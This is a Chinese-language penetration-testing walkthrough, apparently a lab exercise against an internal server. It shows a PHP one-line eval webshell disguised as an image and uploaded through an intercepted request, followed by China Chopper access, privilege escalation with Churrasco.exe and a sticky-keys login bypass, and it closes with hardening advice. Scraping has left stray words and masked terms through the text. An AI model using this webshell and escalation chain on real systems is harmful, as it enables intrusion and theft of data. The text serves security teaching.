任務:某公司受權你對其服務器進行******。對某核心服務器進行***測試,據瞭解,該web服務器ip地址(10.1.1.178)存在敏感數據。php
一、利用網站漏洞獲取該服務器shellweb
二、新建一用戶並將權限提高至管理員sql
三、得到服務器上的關鍵敏感數據(C:\console)內。shell
此文只做爲學習安全
***流程服務器
一、探測信息ide
二、利用漏洞獲得管理帳號密碼工具
三、找到後臺學習
四、登陸後臺取得web權限測試
若是發現直接有上傳漏洞就能夠利用
1.找到上傳漏洞
首先知道ip地址後打開網頁訪問找到站內上傳點
上傳小馬文件報錯,只能上傳圖像文件,只能進行抓包
先進行代理設置
2.代理設置
谷歌插件Proxy SwitchySharp進行代理設置,而後開啓burpsuite抓包這裏就不作介紹了
軟件教學能夠百度去學習代理端口要同樣
3.抓包分析,並改包上傳
開始抓包
help.jpg內容
<?php
eval($_POST['hao']);
?>
修改從新上傳,上傳成功。
4.獲取webshell權限
上述的http就是小馬地址,打開中國菜刀輸入
獲取webshell
5.提高管理權限
新建一用戶並將權限提高至管理員
用cmd命令獲取管理員權限
添加一個用戶hao而後讓他加入管理員組但是失敗了,沒辦法只能在此使用工具提權
上傳腳本,而後重命名,並把php腳本複製到剛纔腳本里從新命名後綴php
在網站提權中咱們常常會使用到這些工具Churrasco.exe (巴西烤肉)
若是說webshell不能執行cmd那麼咱們就須要上傳一個cmd
若是說上傳cmd後不能添加用戶那麼我咱們就須要上傳軟件提權
設置終端路徑
提權不成功沒有administrators組
進入遠程桌面登錄界面 按shift5次獲得cmd whoami /all
咱們找到useras這個組加入進去就ok了
一次圖文並茂的***結束了。拷貝敏感數據就能夠了,讓你們以爲***不在神祕,其實更高層次的技術也在研究中,下次帶來sqlmap 注入實踐教程。
6.安全建議:從上述***測試中發現該服務器
1.及時修補系統中的安全漏洞
2.細化服務器文件目錄權限,杜絕權限漏洞
3.對於上傳權限,能夠經過修改服務器的配置來實現對這個漏洞的預防。不少網站都容許用戶上傳必定數量的圖片、Flash 等,不少時候網站開發人員爲了往後管理方便,對上傳的文件都統一放到指定的一個文件夾裏面,管理員只要對該文件夾的執行權限設置成「無」,這樣必定程度能夠對漏洞進行預防。